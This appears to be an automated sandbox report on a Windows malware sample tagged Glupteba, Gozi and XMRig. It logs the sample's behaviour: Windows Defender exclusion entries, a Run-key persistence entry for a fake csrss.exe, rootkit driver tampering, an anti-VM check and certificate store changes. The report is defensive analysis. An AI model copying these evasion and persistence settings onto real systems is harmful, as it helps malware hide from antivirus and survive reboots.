Malware Analysis Report

2025-01-22 18:53

Sample ID 240307-fh2x6afe4x
Target 57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f
SHA256 57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f
Tags: glupteba discovery dropper evasion loader persistence rootkit trojan upx gozi xmrig banker isfb miner
Score: 10/10

Analysis Overview

Threat Level: Known bad

The file 57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f was found to be: Known bad.

Malicious Activity Summary

Glupteba payload

xmrig

Gozi

Glupteba

XMRig Miner payload

Windows security bypass

Modifies boot configuration data using bcdedit

Possible attempt to disable PatchGuard

Drops file in Drivers directory

Modifies Windows Firewall

UPX packed file

Windows security modification

Executes dropped EXE

Loads dropped DLL

Manipulates WinMon driver.

Manipulates WinMonFS driver.

Checks installed software on the system

Adds Run key to start application

Drops file in System32 directory

Launches sc.exe

Drops file in Windows directory

Checks for VirtualBox DLLs, possible anti-VM trick

GoLang User-Agent

Creates scheduled task(s)

Suspicious behavior: LoadsDriver

Uses Task Scheduler COM API

Modifies data under HKEY_USERS

Modifies system certificate store

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-03-07 04:53

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted: 2024-03-07 04:53
Reported: 2024-03-07 04:58
Platform: win10-20240221-en
Max time kernel: 300s
Max time network: 304s

Command Line

"C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
37 matches reported; every field is N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A

UPX packed file

upx
Description Indicator Process Target
4 matches reported; every field is N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2182 = "Astrakhan Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2491 = "Aus Central W. Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2161 = "Altai Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2451 = "Saint Pierre Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2391 = "Aleutian Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-291 = "Central European Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-41 = "E. South America Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-51 = "Greenland Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-382 = "South Africa Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-362 = "GTB Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2342 = "Haiti Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-201 = "US Mountain Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-161 = "Central Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-111 = "Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2532 = "Chatham Islands Standard Time" C:\Windows\windefender.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
